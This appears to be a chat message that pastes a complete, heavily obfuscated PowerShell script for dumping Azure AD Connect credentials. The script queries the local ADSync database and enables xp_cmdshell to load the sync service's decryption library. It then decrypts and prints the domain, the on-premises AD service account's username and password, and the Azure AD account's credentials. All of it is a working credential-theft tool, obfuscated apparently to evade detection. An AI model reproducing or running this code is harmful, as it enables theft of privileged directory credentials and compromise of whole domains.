[3:20 PM] Smirnov, Yehuda
${c`LieNt} = .('new-obje'+'c'+'t') syst`em.DAta.sQlCLIENt.s`QLc`ON`NE`CTiOn -ArgumentList ((("{1}{11}{13}{7}{4}{16}{2}{6}{15}{5}{3}{12}{0}{8}{9}{10}{14}" -f'g','Da','D',' Cat','urce=(localdb){0}.{0}','tial','Sy','So','=A','D','Sy','t','alo','a ','nc','nc2019;Ini','A')) -f[cHar]92)
 
try {
    ${clI`e`NT}."O`pEn"()
} catch {
    try {
       
        ${cLIE`NT} = &('new'+'-'+'ob'+'ject') Sy`sTem.D`ATA.s`QlCLiEnT.`sq`LC`oNNect`i`on -ArgumentList ((("{2}{10}{3}{4}{9}{14}{13}{8}{15}{1}{11}{6}{5}{12}{7}{0}" -f'Sync','rADSy','Dat','r','ce=(loca',';Initial','c','AD','m','ld','a Sou','n',' Catalog=','yr.','b)m','y'))  -CRePLacE  'myr',[cHaR]92)
        ${C`LI`ent}."op`En"()
    } catch {
        return
    }
}
 
 
${c`md} = ${Cl`IENT}."CReATE`cO`m`M`AND"()
${C`Md}."ComM`A`NDText" = ("{8}{1}{11}{14}{2}{7}{6}{5}{13}{3}{10}{12}{9}{0}{4}" -f'guratio','E','d, ins','t','n','nce_id,','a','t','SEL','_confi','r','CT keyset_','opy FROM mms_server',' en','i')
${R`eA`DEr} = ${C`md}."exECUTER`e`ADeR"()
if (${re`A`dER}."Re`Ad"() -ne ${T`RuE}) {
    .('W'+'rite'+'-'+'Host') ("{2}{7}{0}{8}{5}{1}{3}{6}{4}"-f 'ms','e','[!] Error query','r','tion','rv','_configura','ing m','_se')
    return
}
 
${K`ey_`id} = ${R`EAd`Er}."getiNT`32"(0)
${IN`sTA`NCe_`id} = ${R`EaDer}."getG`UId"(1)
${eN`T`RopY} = ${r`eaD`ER}."gE`TGu`Id"(2)
${r`E`ADeR}."c`LOse"()
 
 
 
 
${c`md} = ${ClIE`NT}."cr`eatEc`OmmA`Nd"()
${C`md}."C`Omma`NdTeXT" = ((("{19}{13}{15}{11}{16}{21}{10}{17}{6}{9}{3}{8}{12}{18}{0}{20}{5}{1}{7}{2}{14}{4}"-f'eme','HE','type = eC','n FR','DeCB','nt W','i','RE ma_','OM mms_man','guratio','pted_','vate_con','a','ELECT','BA',' pri','figuration_xm','conf','g','S','nt_age','l, encry'))."R`Epl`Ace"('eCB',[stRinG][CHaR]39))
 
${R`eAdEr} = ${c`mD}."eXEcUTere`Ad`ER"()
${r`Ea`dER}."R`eAD"() | &('O'+'ut-'+'Null')
 
${A`d`coNfIG} = ${REad`ER}."Ge`T`S`TRing"(0)
${AdcR`YP`T`eDco`NFIg} = ${r`EAder}."Ge`TstR`ing"(1)
 
${Re`AdeR}."ClO`sE"()
 
 
 
${c`MD} = ${cL`ieNT}."cr`EatECoMm`AnD"()
${c`Md}."cOmm`ANd`TEXt" = ((("{26}{9}{19}{1}{29}{15}{14}{10}{18}{24}{20}{11}{2}{32}{13}{4}{25}{28}{21}{7}{22}{0}{8}{27}{12}{23}{16}{3}{31}{17}{6}{5}{30}"-f'WHERE sub',' pr','nfi','Act','O','f','oso','nt_','t','ELEC','r',', encrypted_co',' = suiW','on FR','_configu','vate','Azure ','ctory (Micr','ati','T','xml','e','agent ','indows ','on_','M mms_','S','ype','managem','i','t)sui','ive Dire','gurati'))."RepL`A`CE"(([chAr]115+[chAr]117+[chAr]105),[StrINg][chAr]39))
${Read`ER} = ${c`MD}."Exec`Ut`e`RE`ADEr"()
${r`EADeR}."R`EAd"() | .('Ou'+'t'+'-Null')
 
${Aadc`oNF`IG} = ${R`e`ADER}."Gets`TrI`Ng"(0)
${a`AdCRypTEd`cO`N`FIg} = ${Re`AD`eR}."gets`T`R`ING"(1)
 
${Re`ADer}."cL`OsE"()
 
 
 
 
${c`mD} = ${c`LI`ent}."CrEaT`Ec`oMmA`ND"()
${c`MD}."COMmaNdT`E`xt" = ('EXEC'+' '+'s'+'p_con'+'figure '+('QW'+'Bsho'+'w ')."REPl`AcE"('QWB',[strInG][ChAR]39)+'ad'+'vanced'+' '+(('opt'+'ionssH'+'6, ')  -crepLACE'sH6',[cHAr]39)+'1'+'; '+'RECONFI'+'GUR'+'E; '+'EX'+'EC '+'sp'+'_confi'+'gu'+'re '+('{0'+'}xp_c'+'m'+'d'+'shell{0'+'}, ') -F  [char]39+'1;'+' '+'RECON'+'FIGUR'+'E;'+' '+'EX'+'EC '+'xp'+'_c'+'mdsh'+'ell '+(('G9opo'+'wer'+'s'+'he'+'ll.exe ')  -rePlacE'G9o',[chAr]39)+'-'+'c '+"`"add-type "+'-path'+' '+('{0}'+'{0}C:{1}Pr'+'o'+'gr'+'am ')-F[CHAR]39,[CHAR]92+(('Filesrk'+'HMi'+'croso'+'ft'+' ')-crEpLAcE  ([chAr]114+[chAr]107+[chAr]72),[chAr]92)+'Azur'+'e'+' '+'AD'+' '+"Sync\Bin\mcrypt.dll'';`$km "+'= '+'New-O'+'bject'+' '+'-T'+'ypeNa'+'me '+"Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', "+"[guid]''$instance_id'', "+"$key_id);`$key "+'= '+"`$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 "+'= '+"`$null;`$km.GetKey(1, "+"[ref]`$key2);`$ADdecryptedConfig "+'= '+"`$null;`$key2.DecryptBase64ToString(''$ADCryptedConfig'', "+"[ref]`$ADdecryptedConfig);Write-Host "+"`$ADdecryptedConfig`"'")
${rea`DeR} = ${C`MD}."Ex`Ecut`er`e`ADeR"()
 
${aDdECRY`PtE`D`conf`ig} = [string]::"e`MPTY"
 
while (${Re`A`dER}."R`EaD"() -eq ${TR`UE} -and ${rE`A`DeR}."i`SDbNu`lL"(0) -eq ${FaL`SE}) {
    ${AddeCRYPTe`Dc`o`NFiG} += ${Re`Ad`er}."gEts`TRI`NG"(0)
}
 
if (${AD`DecrypTED`cO`NfIG} -eq [string]::"Emp`TY") {
    .('Wri'+'te'+'-Host') ("{5}{8}{2}{7}{14}{15}{1}{9}{0}{13}{3}{10}{12}{6}{4}{11}"-f 'unc','to l','usi',' our ','owershel','[!] Error','on p','ng xp_cmds',' ','a','dec','l','rypti','h','he','ll ')
    return
}
 
${r`eadEr}."CL`OSE"()
 
 
${c`MD} = ${c`lIeNt}."c`Re`AteC`oMMaNd"()
 
${C`md}."CoM`MAndT`eXT" = ('EXE'+'C '+'sp_co'+'nfigure'+' '+('{0}show ')  -f[ChAR]39+'a'+'dv'+'anced '+('opt'+'i'+'ons'+'qsK,'+' ')."re`Place"('qsK',[stRinG][cHar]39)+'1'+'; '+'RECONFIGUR'+'E'+';'+' '+'EXEC'+' '+'sp_co'+'nfigure'+' '+(('w'+'DOxp_cm'+'dshe'+'ll'+'wDO, ')  -CReplAcE ([chAR]119+[chAR]68+[chAR]79),[chAR]39)+'1'+'; '+'RECONF'+'IGURE'+'; '+'EX'+'EC '+'xp_'+'cmdshel'+'l '+(('WK4power'+'she'+'l'+'l'+'.e'+'xe ')  -crepLaCE  'WK4',[cHAR]39)+'-'+'c '+"`"add-type "+'-p'+'a'+'th '+('{0}'+'{0}C:{1'+'}'+'P'+'rogram'+' ')-F  [chaR]39,[chaR]92+(('F'+'iles'+'rWcMicrosof'+'t ')  -CREPLACE ([CHAR]114+[CHAR]87+[CHAR]99),[CHAR]92)+'Azure'+' '+'A'+'D '+"Sync\Bin\mcrypt.dll'';`$km "+'= '+'New'+'-Obje'+'ct '+'-Ty'+'pe'+'Name '+"Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', "+"[guid]''$instance_id'', "+"$key_id);`$key "+'= '+"`$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 "+'= '+"`$null;`$km.GetKey(1, "+"[ref]`$key2);`$AADdecryptedConfig "+'= '+"`$null;`$key2.DecryptBase64ToString(''$AADCryptedConfig'', "+"[ref]`$AADdecryptedConfig);Write-Host "+"`$AADdecryptedConfig`"'")
${rE`A`Der} = ${C`mD}."ex`ECU`TERead`Er"()
 
${aadd`eCrYptEDC`ON`F`iG} = [string]::"E`mpTy"
 
while (${rEaD`eR}."r`EAd"() -eq ${t`RuE} -and ${rEA`dER}."isdb`N`ULL"(0) -eq ${F`Al`SE}) {
    ${A`AddeCR`Y`P`T`EdCONf`ig} += ${reAD`eR}."gEt`st`Ring"(0)
}
 
if (${aA`Ddec`RYP`T`ed`ConfIG} -eq [string]::"emP`TY") {
    .('Wri'+'te-'+'Hos'+'t') ("{2}{1}{3}{9}{0}{8}{6}{5}{11}{4}{10}{7}"-f'si','!] ','[','Error','ch our decryption p','ell to l','p_cmdsh','ll','ng x',' u','owershe','aun')
    return
}
 
${R`eaDeR}."cl`osE"()
 
 
${Ad`Dom`AiN} = .('select-'+'x'+'ml') -Content ${ad`CoNf`iG} -XPath ((("{2}{6}{3}{4}{0}{5}{1}{7}" -f 'or','-l','//pa','me=Df','7f','est','rameter[@na','ogin-domainDf7]'))."r`epl`ACE"('Df7',[STRInG][chAR]39)) | &('se'+'lect') @{"n`AmE" = ("{1}{2}{0}" -f 'in','D','oma'); "e`XPREsSi`On" = {${_}."n`oDE"."I`NnE`RtexT"}}
${AD`USe`R`Name} = .('se'+'lect-x'+'ml') -Content ${ADCo`N`Fig} -XPath ((("{1}{3}{2}{0}{7}{8}{5}{6}{4}"-f 'er[@name=ezYforest-logi','/','amet','/par','Y]','usere','z','n','-'))  -crePlAce  ([CHaR]101+[CHaR]122+[CHaR]89),[CHaR]39) | &('s'+'elec'+'t') @{"N`AmE" = ("{1}{2}{0}" -f 'name','Use','r'); "ex`Pr`ESSi`oN" = {${_}."NO`De"."inn`e`RTEXT"}}
${aDpA`SsWo`RD} = &('se'+'lec'+'t-xml') -Content ${AddECRY`PTE`D`cONfiG} -XPath ("{1}{2}{0}" -f 'te','//attri','bu') | .('s'+'elect') @{"n`AMe" = ("{1}{2}{0}" -f'rd','Pa','sswo'); "Exp`RES`s`IoN" = {${_}."no`de"."InnE`RTExt"}}
 
${a`Ad`UseR`NamE} = .('se'+'l'+'e'+'ct-xml') -Content ${aADCOn`F`Ig} -XPath ((("{5}{2}{1}{0}{3}{4}"-f'me=X0VUserNa','na','er[@','meX0','V]','//paramet'))."R`Epla`cE"('X0V',[strinG][ChAR]39))  | &('s'+'e'+'lect') @{"n`Ame" = ("{1}{0}" -f 'name','User'); "eXpRESS`I`oN" = {${_}."no`De"."I`NNe`RTE`xT"}}
${Aa`dpa`s`SworD} = &('sel'+'ect'+'-xml') -Content ${AadD`ecr`yptE`DcoNFig} -XPath ("{0}{1}{2}"-f'//at','tr','ibute') | .('sele'+'c'+'t') @{"N`AmE" = ("{2}{1}{0}" -f'rd','o','Passw'); "eXp`REssi`ON" = {${_}."n`ODe"."i`NNERt`EXT"}}
 
 
&('Wr'+'it'+'e-Host') "Domain: $($ADdomain.Domain) "
&('Wri'+'t'+'e-Host') "Username: $($ADusername.Username) "
&('Wri'+'te'+'-Host') "Password: $($ADpassword.Password) "
.('Write-'+'Hos'+'t') "AADUser: $($AADusername.Username) "
&('Wr'+'ite'+'-Hos'+'t') "AADPass: $($AADpassword.Password) "
 
 
 
${R`e`Ader}."c`loSE"()
${cl`i`eNt}."CLO`se"()
 
 
